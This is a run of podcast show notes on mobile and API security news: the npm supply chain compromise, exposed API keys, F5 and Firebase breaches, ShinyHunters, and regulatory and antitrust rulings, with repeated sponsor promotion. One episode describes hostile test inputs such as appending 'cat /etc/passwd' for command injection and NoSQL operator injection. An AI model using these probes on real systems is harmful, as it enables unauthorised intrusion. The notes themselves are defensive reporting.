revenue, digital payments, emerging payments, API security.            🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

The Billion-Download Backdoor: Defending Client-Side Supply Chains Against Crypto-Draining NPM Attacks--------------------------------------------------------------------------------Episode NotesIn early September 2025, the open-source software ecosystem faced a massive supply chain attack when attackers compromised trusted maintainer accounts on npm using targeted phishing emails. This security breach led to the injection of malicious code into 18 widely used npm packages—such as chalk, debug, and ansi-styles—which together account for more than 2 billion downloads per week.This episode dives into the mechanics of the attack, the threat posed by the complex malware deployed, and the role of advanced AI-powered defenses in preventing client-side disaster.Key TakeawaysThe Threat Landscape The attackers' primary goal was crypto-stealing or wallet draining. The compromised packages contained obfuscated JavaScript, which, when included in end-user applications (including web projects and mobile apps built with frameworks like React Native or Ionic), was activated at the browser level. This malware would intercept network traffic and API requests, ultimately swapping legitimate cryptocurrency addresses (including Bitcoin, Ethereum, and Solana) with the attackers' wallets. The attack leveraged the human factor, as maintainers were tricked by phishing emails urging them to update two-factor authentication credentials via a fake domain, npmjs[.]help.The Evolution of Malware: Shai-Hulud Beyond crypto-hijacking, researchers detected a complex self-replicating worm dubbed Shai-Hulud. This advanced payload targets development and CI/CD environments:• Autonomous Propagation: Shai-Hulud uses existing trust relationships to automatically infect additional NPM packages and projects.• Credential Theft: Using stolen GitHub access tokens, the worm lists and clones private repositories to attacker-controlled accounts.• Secret Harvesting: It downloads and utilizes the secret-scanning tool TruffleHog to harvest secrets, keys, and high-entropy strings from the compromised environment.• Malicious Workflows: Shai-Hulud establishes persistence by injecting malicious GitHub Actions workflows into repositories, enabling automated secret exfiltration.Automated Defense with AI Security Cloudflare’s client-side security offering, Page Shield, proved critical in mitigating this threat. Page Shield assesses 3.5 billion scripts per day (40,000 scripts per second) using machine learning (ML) based malicious script detection.• Page Shield utilizes a message-passing graph convolutional network (MPGCN). This graph-based model learns hacker patterns purely from the structure (e.g., function calling) and syntax of the code, making it resilient against advanced techniques like code obfuscation used in the npm compromise.• Cloudflare verified that Page Shield would have successfully detected all 18 compromised npm packages as malicious, despite the attack being novel and not present in the initial training data.• While patches were released quickly (in 2 hours or less), Page Shield was already equipped to detect and block this threat, helping users "dodge the proverbial bullet".Security RecommendationsTo protect against fast-moving supply chain attacks, organizations must maintain vigilance and implement automated defenses:1. Audit Dependencies: Review your dependency tree, checking for versions published around early–mid September 2025. Developers should pin dependencies to known-good versions.2. Rotate Credentials: Immediately revoke and reissue any exposed CI/CD tokens, cloud credentials, or service keys that might have been used in the build pipeline.3. Enforce MFA: Tighten access policies and enforce multi-factor authentication (MFA) on all developer and CI/CD access points.4. Proactive Monitoring: Monitor build logs and environments for signs of suspicious scanning activity, such as the use of TruffleHog.--------------------------------------------------------------------------------🔗 Relevant Links and Resources• Cloudflare: How Cloudflare’s client-side security made the npm supply chain attack a non-event    ◦ Cloudflare Page Shield Script detection• Trend Micro Research: What We Know About the NPM Supply Chain Attack• Kaspersky Blog: Popular npm packages compromised🛡️ SponsorThis episode of Upwardly Mobile is brought to you by our friends at approov.io.--------------------------------------------------------------------------------Keywords:NPM supply chain attack, Cloudflare Page Shield, Shai-Hulud worm, Cryptohijacker, crypto-stealing malware, client-side security, JavaScript obfuscation, open-source security, dependency audit, CI/CD security, phishing attack, MPGCN, machine learning security, developer accounts compromise, npm packages, software security.         🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

The Unseen Storm: Securing APIs and Protecting Against Key ExposureThis week on Upwardly Mobile, we delve into the hidden dangers lurking within seemingly simple applications and the advanced solutions required to close the modern mobile security trust gap. We analyze a case study involving a basic weather application to illustrate how common development mistakes—like exposing sensitive API keys and neglecting input validation—create catastrophic security vulnerabilities, potentially leading to data breaches, financial loss, and system compromise. The Problem: Client-Side Secrets and Architectural Flaws The proliferation of web applications consuming public APIs has vastly expanded the attack surface. Developers often treat the client environment as trusted, leading to critical architectural failures. We discuss how exposed API keys embedded in client-side JavaScript are considered "low-hanging fruit" for attackers.Key Takeaways from the Security Analysis:Reconnaissance and Exploitation: Attackers can use tools like curl and grep with regular expressions to scan target URLs for hardcoded API key patterns. Once obtained, keys can be used for unauthorized calls, potentially exceeding quotas and incurring costs.Interception: Tools like Burp Suite enable attackers to intercept and modify API traffic, revealing the exact structure of API calls, including the API key and parameters.Injection Attacks: Poor input sanitization on server-side search functionalities is a primary attack vector. We examine verified command snippets used to test for command injection (e.g., appending cat /etc/passwd) and NoSQL Injection (e.g., using MongoDB operator syntax).Lateral Movement: An exposed API key is often just the beginning. If the key has excessive permissions, it can allow an attacker to enumerate IAM policies, check for sensitive S3 buckets, and even create persistent administrative users, leading to a full cloud account takeover.Defensive Fundamentals for Developers: To combat these threats, security must be shifted left—integrated into the earliest stages of development. We review critical defensive measures:Environment Variable Security: API keys must never be exposed to the client; they should reside in secure server-side environment variables. The client should request data from your secure server endpoint, which then internally fetches the data from the third-party API using the hidden key.Rate Limiting: To protect backend APIs from abuse and "Denial-of-Wage" attacks (attacks that incur cost), rate limiting middleware (like express-rate-limit) is essential. This blocks automated scripts by limiting each IP to a set number of requests within a time window.Cloud Hardening: Security extends to infrastructure. Developers must audit cloud resources, checking S3 bucket policies for leaks and ensuring EC2 security groups only allow necessary web traffic (ports 80 and 443).Closing the Mobile API Security Trust Gap with Positive Authentication While these fundamentals are crucial, mobile app security introduces unique challenges, creating a concerning "trust gap". Traditional security measures like TLS, mutual TLS, embedded API keys, and signature-based approaches are often insufficient, as they are vulnerable to reverse engineering, MitM attacks, and spoofing. We discuss Approov, a solution designed for the mobile world that uses a positive trust model to authenticate the app instance itself, rather than just the user or the connection.App Attestation: Approov uses a challenge-response cryptographic protocol to dynamically measure the integrity of the runtime app image.Tokens (JWT): Only genuine, untampered apps are granted a short-lived JSON Web Token (JWT). Requests without a valid token are immediately rejected by the backend API.Protection against Reverse Engineering: Because the system does not rely on static secrets embedded in the app, traditional reverse engineering techniques are ineffective. Approov also provides a runtime secrets protection capability, allowing developers to remove third-party API keys from the app package entirely, substituting them only just in time for the API call after the app has passed attestation.Benefits: This positive authentication model blocks sophisticated bots, automated scraping systems, and repackaged apps, ensuring that only registered, authentic versions of your application can access your valuable digital assets.Links & Resources Source Material Reference:Excerpts from "The Unseen Storm: How A Simple Weather App Exposes Critical API Security Flaws - Undercode Testing"Excerpts from "WP-How Approov Adresses the Security Trust Gap"Sponsor:Learn how Approov protects your revenue and business data by deploying Mobile Security: approov.ioKeywords API security, mobile security, API key protection, reverse engineering, input validation, client-side vulnerabilities, app attestation, JWT, zero-trust architectures, rate limiting, cloud security, Denial-of-Wage, Man-in-the-Middle (MitM), Burp Suite, Approov. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

UK CMA Declares Apple & Google Have Strategic Market Status (SMS): The Future of Mobile Competition and Security In this pivotal episode of "Upwardly Mobile," we break down the monumental decision by the UK Competition and Markets Authority (CMA) to officially designate Apple and Google with Strategic Market Status (SMS) in their respective mobile platforms. This move is set to reshape digital markets across the UK and has massive implications for app developers, businesses, and mobile security worldwide. Key Takeaways from the CMA's Decision (Published 22 October 2025): The CMA launched its investigations in January 2025 under the Digital Markets, Competition and Consumers Act 2024 (DMCCA), aiming to address the "unprecedented market power" held by a few large digital firms.SMS Designation Confirmed: Following consultation with over 150 stakeholders, the CMA confirmed that both Apple and Google meet the legal tests for having Substantial and Entrenched Market Power (SEMP) and a Position of Strategic Significance (POSS) in their mobile platforms.Scope of Mobile Platforms: The designation applies to the holistic Mobile Platform provided by each company, grouping together highly interconnected digital activities:Apple: Smartphone Operating System (iOS), Tablet Operating System (iPadOS), Native App Distribution (App Store), and Mobile Browser and Browser Engine (Safari and WebKit).Google: Mobile Operating System (Android), Native App Distribution (Play Store), and Mobile Browser and Browser Engine (Chrome and Blink).Market Dominance: CMA findings confirmed that almost all UK mobile device holders use either Apple or Google's platform. Users are unlikely to switch between them, reinforcing their dominance. Furthermore, to reach both user bases, businesses must distribute their content through both platforms, effectively making them "must-have" channels.Market Entrenchment: The CMA concluded that competitive constraints are currently limited. Despite the rapid deployment of technologies like Artificial Intelligence (AI), these developments are deemed unlikely to eliminate Apple or Google’s market power over the five-year designation period.Economic Impact: The designation acknowledges the crucial role of these platforms, noting that the UK app economy generates an estimated 1.5% of the UK’s GDP and supports about 400,000 jobs, encompassing sectors like FinTech and mobile gaming.What Happens Next? The SMS designation itself is not a finding of wrongdoing and does not introduce immediate new requirements. However, it acts as the gateway for the CMA to introduce targeted and proportionate interventions, such as Conduct Requirements or Pro-Competition Interventions, designed to ensure open choices, fair dealing, and trust and transparency within these vital digital activities. This action mirrors regulatory efforts globally, including the EU’s Digital Markets Act (DMA) and legal actions in the US and Japan. 🎧 Sponsored by Approov We are entering a "pivotal era for mobile technology" where regulatory interventions like the CMA’s SMS designation and the EU's DMA are weakening the centralized control over app distribution held by Apple and Google. This shift "opens the floodgates for alternative app stores, sideloading, and direct-to-consumer models". As mobile security risks move beyond platform constraints, secure your applications and APIs with a truly cross-platform, developer-centric solution. Visit approov.io for more information on how to implement modern app and API protection. 🔗 Useful Links & ResourcesCMA Final Decision on Apple’s Mobile Platform (22 October 2025): [www.gov.uk/cma]CMA Final Decision on Google’s Mobile Platform (22 October 2025): [www.gov.uk/cma]CMA Press Release: CMA confirms Apple and Google have strategic market status in mobile platforms: [www.gov.uk/cma]💡 Keywords CMA, Strategic Market Status (SMS), Digital Markets Competition and Consumers Act 2024 (DMCCA), Apple Mobile Platform, Google Mobile Platform, mobile platform, app distribution, mobile browser, mobile security, iOS, Android, App Store, Play Store, WebKit, Blink, API protection, sideloading, app economy, tech regulation. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

API Security Under Fire: F5's Zero-Day Roadmap and the Unacceptable Risk to Mobile AppsThe F5 BIG-IP Breach and What It Means for Developers This week on Upwardly Mobile, we dive into the fallout from the catastrophic security breach at F5 Networks, where a sophisticated nation-state adversary compromised the integrity of the critical BIG-IP product line. We discuss why this incident poses an imminent and unacceptable risk to organizations—especially mobile app developers who rely on F5 devices for critical API security infrastructure like load balancing and firewalling. The Compromise: Source Code, Credentials, and Zero-Day Roadmaps The threat actor maintained long-term, persistent access to F5’s internal systems, specifically the BIG-IP product development environment and engineering knowledge platforms. This sophisticated attack led to the theft of crucial materials:Proprietary Source Code: Portions of the proprietary source code for the flagship BIG-IP product line were exfiltrated. While F5 confirmed the actor did not inject malicious code, possessing the source code allows adversaries to analyze it for vulnerabilities or backdoor opportunities.Vulnerability Roadmap: Attackers gained access to internal documentation detailing undisclosed (zero-day) vulnerabilities that F5 engineers were investigating or fixing. This provides the adversaries with a virtual roadmap, enabling them to rapidly develop exploits for unpatched flaws.Customer Configuration Data: A small portion of customer-specific data was stolen, including network topologies, device configurations, or deployment details. For developers managing mobile APIs, this stolen information increases the risk that sensitive credentials can be abused and attackers can target specific deployment setups.Urgent Action Required: The CISA Emergency Directive The severity of the incident prompted the Cybersecurity and Infrastructure Security Agency (CISA) to issue an Emergency Directive for federal agencies, underscoring the potential for widespread exploitation. Developers and organizations using F5 devices must take immediate action:Patch Immediately: Install the latest security updates, particularly the Quarterly Security Notification F5 released simultaneously, which addressed 44 new vulnerabilities.Isolate Management Interfaces: Identify all F5 resources and critically, isolate management interfaces from the internet to prevent initial access and investigate any exposure.Adopt Zero Trust: Implement a zero trust architecture to reduce the attack surface and block lateral movement. Prioritize connecting users directly to applications, not the underlying network.Change Credentials: Change all default credentials immediately.Sponsor Segment Securing mobile APIs from threats that target application logic and device integrity is paramount. To fortify your defenses against sophisticated adversaries like the one in the F5 breach, explore approov.io. Approov provides crucial mobile app and API protection by verifying the authenticity of mobile apps and ensuring only legitimate, untampered clients can access your APIs.Relevant LinksF5 Security Advisory: CISA Emergency Directive: Sponsor Website: approov.ioKeywords: F5, BIG-IP, API Security, Mobile App Security, Zero-Day Vulnerability, Source Code Theft, Nation-State Hacking, CISA, Emergency Directive, Zero Trust, Load Balancer, Firewall, Patching, UNC5221, BRICKSTORM, Cybersecurity, Network Topology, Credential Abuse, Upwardly Mobile🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Corporate Extortion and the Fall of BreachForums: Tracking ShinyHuntersIn this episode of "Upwardly Mobile," we dive into the world of high-stakes corporate extortion, focusing on the sophisticated cybercriminal group ShinyHunters (also tracked as UNC6040) and the subsequent takedown of their infamous platform, BreachForums. The sources detail how the FBI, in collaboration with French law enforcement authorities, seized the Breachforums.hn domain, which the Scattered Lapsus$ Hunters (a gang linked to ShinyHunters, Scattered Spider, and Lapsus$) were using as a data leak and extortion site. This action involved switching the domain’s nameservers to ns1.fbi.seized.gov and ns2.fbi.seized.gov. ShinyHunters confirmed the seizure, noting that law enforcement gained access to BreachForums database backups dating back to 2023 and escrow databases since the latest reboot, effectively declaring that "the era of forums is over". Despite the clearnet site takedown, the threat actors maintained that their Tor dark web site was still accessible and that the seizure would not affect their campaign. The Massive Salesforce Extortion Campaign The core focus of the Scattered Lapsus$ Hunters’ recent activity was an extensive Salesforce extortion campaign. This campaign originated in May 2025 when ShinyHunters launched a social engineering campaign using voice phishing to trick targets into connecting a malicious app to their organization’s Salesforce portal. The hackers claimed to have stolen more than one billion records containing customer information. The long list of affected companies included major corporations such as FedEx, Disney/Hulu, Home Depot, Marriott, Google, Cisco, Toyota, Gap, McDonald's, Walgreens, and Chanel. Salesforce has publicly stated that they will not engage, negotiate with, or pay any extortion demand. Beyond Salesforce: Discord and Red Hat The criminal group also claimed responsibility for other significant intrusions:Red Hat Data Theft: The Scattered Lapsus$ Hunters took credit for compromising a Red Hat GitLab server, stealing more than 28,000 Git code repositories and sensitive internal documents, including customer secrets and infrastructure details.Discord Breach: ShinyHunters claimed responsibility for an incident affecting Discord users. Discord confirmed that an unauthorized party compromised a third-party customer service provider (5CA), impacting a limited number of users who had contacted Customer Support or Trust & Safety teams. Critically, the unauthorized party gained access to a small number of government-ID images submitted for age verification appeals, as well as usernames, emails, limited billing info, and IP addresses.Tactics and Targets The group employs sophisticated tactics, including exploiting zero-day vulnerabilities, such as a critical flaw in Oracle’s E-Business Suite software (CVE-2025-61882). Furthermore, members of the group have been known to distribute malware—specifically the commercially available ASYNCRAT backdoor—disguised as a Windows screensaver file (.scr) via menacing, targeted emails. This highlights the constant pressure faced by security professionals, often from threat actors derisively called "Advanced Persistent Teenagers" (APTs). Links & ResourcesLaw Enforcement Takedown: Nameservers used in the FBI seizure: ns1.fbi.seized.gov and ns2.fbi.seized.gov.Publications Cited: Information confirmed by BleepingComputer and reported by KrebsOnSecurity.Discord Security Incident: Discord confirmed they would contact impacted users via [email protected] Validation: Join the Picus BAS Summit to experience the future of security validation.ASYNCRAT Analysis: Virustotal analysis on the ASYNCRAT malware provided via link.🛡️ Sponsor: approov.io To ensure your mobile and web applications are secure against sophisticated attacks, trust the experts. Learn more about enhanced security measures and API protection at approov.io.Keywords ShinyHunters, BreachForums, Salesforce Extortion, FBI Takedown, Scattered Lapsus$ Hunters, Data Breach, Red Hat, Discord Hack, Voice Phishing, Cybercrime, Hacking Forum, ASYNCRAT, UNC6040, CVE-2025-61882, Security Validation. Relevant 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Mobile is officially the digital default. In this episode of Upwardly Mobile, we explore the staggering statistics showing mobile devices dominating global internet usage and discuss the critical security challenges that arise from this mobile-first environment. We then delve into the cutting-edge solution offered by our sponsor, Approov, and their latest platform update, Approov 3.5, designed to secure brands against evolving threats, including AI-driven attacks and new regulatory pressures.The Mobile Tipping Point: 64% and RisingThe mobile landscape is at an inflection point. As of 2025, over 64% of all website traffic comes from mobile devices. This dominance is driven by the fact that nearly 96.3% of internet users access the internet using a mobile phone.• This shift is not just a trend; it is the new normal.• Mobile traffic reached 64.1% in Q2 2025, marking eight consecutive quarters of growth.• Developing regions are leading the surge, with Africa having the highest proportion of mobile internet traffic at 69.13%, and Asia seeing 72.3% of all web traffic coming from smartphones.• The most common activities performed on smartphones include playing a game (68%), listening to music (67%), and using social media (63%).The Security Gap in a Mobile-First WorldThe widespread adoption of mobile creates significant security vulnerabilities. Automated threats make it easier for bad actors to clone legitimate apps, steal data, and commit fraud, which can cause irreparable damage to a brand's reputation and financially devastate users. Furthermore, new security gaps are emerging due to regulations like the EU’s Digital Markets Act (DMA), which mandates support for third-party app stores, increasing the risk of fraudulent apps.Approov 3.5: Protecting the Critical ConnectionApproov, the leader in mobile API security, addresses these threats by acting as a digital gatekeeper. Approov protects the critical connection between a mobile app and a company's backend servers (APIs). It ensures that only genuine, untampered apps running in a secure environment can access sensitive services, blocking automated bots, modified apps, and cloned apps before they can compromise data.The latest platform update, Approov 3.5, delivers next-generation attestation:• Ready for the DMA and Open App Stores: Approov’s cloud-based verification ensures only genuine app instances—regardless of their distribution source—can access a company’s APIs.• Hardware-Backed Security (Android): Cryptographic keys are stored in a secure, isolated “vault” on the device’s hardware, making cloning an app’s identity virtually impossible.• Defense Against AI-Powered Attacks: The platform provides real-time threat analytics, allowing security teams to dynamically issue over-the-air (OTA) updates to block emerging AI threats without requiring an app update.• Immutable App Signature: This feature creates a unique fingerprint upon installation, continuously verifying the app’s integrity against tampering or repackaging with malware.• Memory Dump Detection: A new defense actively blocks attackers attempting to scrape sensitive information, such as AI secrets or user credentials, directly from the device’s memory.Approov has proven that robust security can be achieved without compromising user experience, offering fast and responsive cross-platform security checks for iOS, Android, and HarmonyOS. By verifying API requests, Approov reduces API attacks by over 95%.--------------------------------------------------------------------------------KeywordsMobile traffic, API security, Approov 3.5, mobile app security, Digital Markets Act (DMA), hardware-backed security, 64% web traffic, AI-powered attacks, mobile-first, app cloning, fraud prevention, mobile API.Sponsor LinkFor more information on securing your mobile application and APIs, please visit our sponsor: www.approov.io.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

In this episode of Upwardly Mobile, we dive into the significant legal challenges facing major technology companies—Apple, Google (Alphabet), and Meta Platforms—as they are forced to defend themselves against class action lawsuits alleging that they promoted and profited from illegal social casino gambling apps. A recent ruling by U.S. District Judge Edward Davila in San Jose, California, denied the companies' requests to dismiss the lawsuits. The plaintiffs, numbering in the dozens, contend that the companies' platforms—Apple’s App Store, Google’s Play Store, and Meta’s Facebook—promoted an “authentic Vegas-style experience of slot machine gambling” through an allegedly illegal racketeering conspiracy. Key Takeaways from the Litigation:The Liability Claim: The core claim is that the defendants "willingly assist, promote and profit from" allegedly illegal gambling. This is achieved by:Offering users access to the apps through their stores.Taking a substantial percentage of consumer purchases (estimated at 30% commission, totaling over $2 billion) on in-app transactions for items like Game Coins and Sweeps Coins.Processing these allegedly illicit transactions using proprietary payment systems.Using targeted advertising to "shepherd the most vulnerable customers" to the casino apps.The Section 230 Defense Rejected: Apple, Google, and Meta argued that Section 230 of the federal Communications Decency Act protected them from liability because this law shields online platforms from lawsuits over third-party content. Judge Davila rejected this argument, finding that the companies did not act as "publishers" when processing payments. The judge emphasized that the "crux of plaintiffs’ theory is that defendants improperly processed payments for social casino apps"."Neutral Tools" Argument Undercut: The court called it irrelevant that the companies provided "neutral tools" (like payment processing) to support the apps.Damages Sought: The lawsuits seek unspecified compensatory and triple damages, among other remedies.Appeals and Case History: Judge Davila allowed the defendants to immediately appeal his decision to the 9th U.S. Circuit Court of Appeals, acknowledging the importance of the Section 230 issues. The litigation against the Silicon Valley-based companies began in 2021.Additional Suits: Separately, a new lawsuit was filed against Apple and Google by lead Plaintiff Bargo (not naming the social casino operators), alleging the distribution of "patently illegal gambling software" in New Jersey and New York. This complaint includes legal claims under NJ and NY gambling loss recovery statutes, consumer protection laws, and RICO laws.Sponsor Message: This episode of Upwardly Mobile is brought to you by our sponsor. Learn how to secure your mobile app business today. Visit approov.io. Relevant Source Materials & Case Information:Article Reference (Legal Analysis): Excerpts from "Apple and Google Hit with New Social Casino Gambling Lawsuit," National Law Review (October 02, 2025). (Article written by James G. Gatto of Sheppard, Mullin, Richter & Hampton LLP).Article Reference (News): "Apple, Google, Meta must face lawsuits over gambling apps," Honolulu Star-Advertiser (Oct. 1, 2025).Article Reference (Judicial Denial): "Judicial Denial for Tech Giants in Casino App Lawsuits" (Sept 30).Amicus Brief Reference: In re: Casino-Style Games Litigation (Nos. 22-16914, 22-16916, 22-16888, 22-16889, 22-16921, 22-16923) U.S. Court of Appeals for the Ninth Circuit.District Court Case Reference (Northern District of California): In re Apple Inc App Store Simulated Casino-Style Games Litigation, No. 21-md-02985; In re Google Play Store Simulated Casino-Style Games Litigation, No. 21-md-03001; and In re Facebook Simulated Casino-Style Games Litigation, No. 21-02777.Sponsor Link: approov.ioKeywords for SEO Optimization: Social Casino Lawsuit, Apple, Google, Meta, Section 230, Gambling Apps, App Store, Play Store, Communications Decency Act, Platform Liability, Edward Davila, Consumer Protection, Racketeering, Illegal Gambling, Tech Litigation, In-App Purchases, RICO.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

In this critical episode of Upwardly Mobile, we delve into the alarming cybersecurity incident involving massive data exposure stemming from misconfigured Firebase servers. Cybersecurity researchers uncovered a breach that exposed the sensitive information and plaintext passwords of over 1.8 million users. This wasn't the result of sophisticated hacking, but rather "basic negligence" and developers failing to implement standard security settings.We discuss why Firebase, Google's popular backend-as-a-service (BaaS) for mobile apps, has become a liability risk when developers neglect configuration best practices.What was exposed and the devastating scope of the leak:The scope of this data leak is massive, involving publicly accessible Firebase real-time databases used by more than 900 mobile applications, predominantly Android-based. These affected apps spanned categories including health, fitness, education, and finance.The highly sensitive user data exposed included:• Plaintext passwords (unencrypted)• Usernames, email addresses, and phone numbers• Billing information• High-privilege API tokens, AWS root access tokens, and private chat logs• Millions of user ID photos.The Failure of Security as an Afterthought:Experts warn that storing plaintext passwords on open cloud databases in 2025 is "reckless". The breach occurred because developers failed to secure their Firebase instances, often by extending insecure "test-mode" configurations or inadvertently leaving production environments vulnerable. Responsibility for this preventable disaster lies with both the developers and Firebase itself, for allowing insecure default settings.We also explore the technical mechanism behind these breaches: Automated scanning tools (like OpenFirebase) are actively exploiting this vulnerability by parsing Android Package Kit (APK) files to extract Firebase project IDs, API keys, and subsequently probing service URLs for unauthenticated access.This incident serves as a strong wake-up call for the tech industry, emphasizing the critical need for mandatory security training and treating security as a core function of software development—not an afterthought.--------------------------------------------------------------------------------🛡️ Sponsor: ApproovProtect your mobile APIs and prevent automated attacks that exploit hardcoded secrets and misconfigurations. Secure your apps from the client-side up.Learn more and protect your platform at https://approov.io.--------------------------------------------------------------------------------Source Materials & Links• Article 1: "Massive data leak exposes passwords of 1.8 million users through misconfigured Firebase servers," ZENDATA (May 25, 2025).• Article 2: "Numerous Applications Using Google's Firebase Platform Leaking Highly Sensitive Data," Cyber Security News (September 25, 2025).--------------------------------------------------------------------------------Keywords: Data Leak, Firebase Security, Plaintext Passwords, Cybersecurity, Mobile App Security, Google Firebase, Cloud Misconfiguration, Data Breach, Developer Negligence, API Security, Android Security, BaaS, App Development.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Neon's Data Disaster: How a Viral AI App Exposed 75,000 Users and Went DarkIn this urgent episode of Upwardly Mobile, we break down the spectacular rise and immediate fall of the highly controversial mobile application, Neon. The app, which recently topped the charts and went viral on platforms like TikTok, promised users payment in exchange for recording their phone calls. These recordings were then sold to AI companies for training. However, less than 24 hours after gaining widespread attention, a significant security flaw was discovered. According to reports from TechCrunch, this flaw allowed public access to extremely sensitive user data. The Security Catastrophe The call-recording app had rapidly climbed the App Store ranks, reporting 75,000 downloads in a single day. Despite its rapid growth, Neon was forced offline after the security issue was discovered by TechCrunch. The flaw was so severe that it allowed anyone utilizing a network analysis tool to access private information belonging to other users. Exposed data included:Users' phone numbers.Call recordings and accessible URLs to the raw audio files.Text transcripts of the recorded calls.Detailed metadata connected to the calls, including the phone number of the person called, the time and duration of the call, and the amount earned from the call.The Company Response Following the discovery, Neon founder Alex Kiam sent an email to customers notifying them of the app's temporary shutdown. Kiam stated that they were taking the app down to "add extra layers of security" because "Your data privacy is our number one priority". However, it is crucial to note that the email failed to warn users about the specific security issue or that their phone numbers, call recordings, and transcripts had been exposed. TechCrunch noted that although the app's servers were taken down, rendering the app useless, it remained available in the App Store. If Neon does make a comeback, it will certainly receive increased scrutiny regarding its security protocols. Secure Your Mobile Infrastructure with Our Sponsor In a world where mobile app security flaws can rapidly expose millions of data points, protecting your back-end servers and APIs is non-negotiable. Our episode today highlights the critical importance of mobile app protection from the get-go. Learn how to implement proactive mobile security measures. Visit: approov.io Relevant Source Materials & Further ReadingExcerpts from "Neon, the viral app that pays users to record calls, goes offline after exposing data | Mashable"Excerpts from "Viral call-recording app Neon goes dark after exposing users' phone numbers, call recordings, and transcripts | TechCrunch"Keywords: Neon app security flaw, AI training data, call recording app, data privacy, cybersecurity, mobile app data exposure, Alex Kiam, App Store security, TechCrunch exclusive, data breach, viral app failure, mobile security. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Google's Legal Gauntlet: Antitrust Battles and the Future of the App Ecosystem This week on Upwardly Mobile, we dissect the flurry of major legal decisions facing Google in September 2025, from its desperate plea to the Supreme Court to halt the Epic Games injunction to the final ruling in the federal search monopoly case. We explore the massive shifts coming to the Android app ecosystem and Google's mandated business practice changes. Episode Notes September 2025: A Critical Month for Google's Antitrust Defense Google is challenging two massive antitrust rulings simultaneously, initiating what the sources describe as its "last hope" to maintain control over core business functions. Part 1: The Epic Games Showdown at the Supreme Court Google has asked the U.S. Supreme Court to intervene and pause the injunction it received following a major legal loss to Epic Games in October 2024. The company is seeking a decision on the stay by October 17, just days before the injunction is scheduled to take effect around October 20 or 22. The injunction, upheld by the Ninth Circuit Court of Appeals, requires Google to make several fundamental changes to the Google Play Store and the Android app ecosystem:Open the Play Store: Google must allow users to download and use third-party app stores for a period of three years.External Billing: Google is no longer allowed to force developers to use its billing system; developers must be allowed to include external links in apps, enabling users to bypass Google’s billing system.End Pre-Install Deals: Google can no longer make deals around pre-installing the Play Store on phones.Google argues that this "unprecedented antitrust injunction" will "[create] enormous security and safety risks" by allowing the proliferation of stores that stock "malicious, deceptive or pirated content". Furthermore, Google claims the injunction burdens developers with constantly monitoring numerous stores and makes it substantially easier for developers to avoid compensating Google for services. Epic Games strongly disagrees, stating that Google continues to rely on "flawed security claims" rejected by the jury and the Ninth Circuit. Epic maintains that the injunction should go into effect so consumers and developers can benefit from competition, choices, and lower prices. Part 2: The Search Monopoly Ruling In a separate, long-running federal monopoly case, U.S. District Judge Amit Mehta ruled on remedies following his earlier decision that Google had acted illegally to maintain a monopoly in internet search. Key aspects of Judge Mehta's September 2025 ruling include:No Divestiture of Chrome/Android: The judge denied the Department of Justice's proposal to force Google to sell its Chrome browser or divest the Android operating system, ruling that the government had "overreached".End Exclusive Deals: Google is no longer permitted to strike exclusive deals around the distribution of search, Google Assistant, Gemini, or Chrome. For example, Google cannot require device makers to pre-load its apps in order to gain access to the Play Store.Data Sharing: Google must share some of its search data with competitors going forward to narrow the "scale gap" created by exclusive distribution agreements. (Google is not required to share data related to its ads).Google called the decision "largely a win" but expressed concerns about the requirements to share Search data and the new limits imposed on how Google distributes its services.🛡️ Sponsored by Approov As discussions around third-party app stores and sideloading intensify due to the Epic v. Google injunction, the need for robust mobile app security is paramount. Approov provides essential security solutions for developers navigating these new challenges. Approov offers mobile app attestation solutions that allow developers to safely distribute mobile apps through third-party app stores by significantly mitigating the primary risks associated with sideloading, such as malware, app tampering, and fraudulent API use. Approov verifies both the integrity of the app and the device environment, ensuring that only genuine, unmodified app instances—regardless of installation source—can communicate with backend APIs. Approov's system works across Android, iOS, and HarmonyOS. Learn how Approov secures your APIs and mobile apps against evolving threats related to sideloading and third-party distribution: [approov.io] Relevant Links (Source Material)Epic Games Lawsuit: Coverage regarding Google’s request for a Supreme Court stay and the opening of the Play Store (as reported by Engadget, Thurrott.com, The Verge, and Reuters).DOJ Monopoly Case: Reporting on Judge Amit Mehta’s final ruling, which denied the divestiture of Chrome but mandated changes to Google’s search distribution and data sharing practices (as reported by Engadget).Security Solutions: Information on mobile app attestation and security best practices for apps distributed through third-party channels.Keywords: Google Supreme Court, Epic Games, Antitrust, Google Play Store, Android Ecosystem, Third-Party App Stores, App Store Security, Chrome Monopoly, Judge Amit Mehta, DOJ Lawsuit, App Distribution, Mobile App Attestation, Approov, Digital Marketplace, Competition Law. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 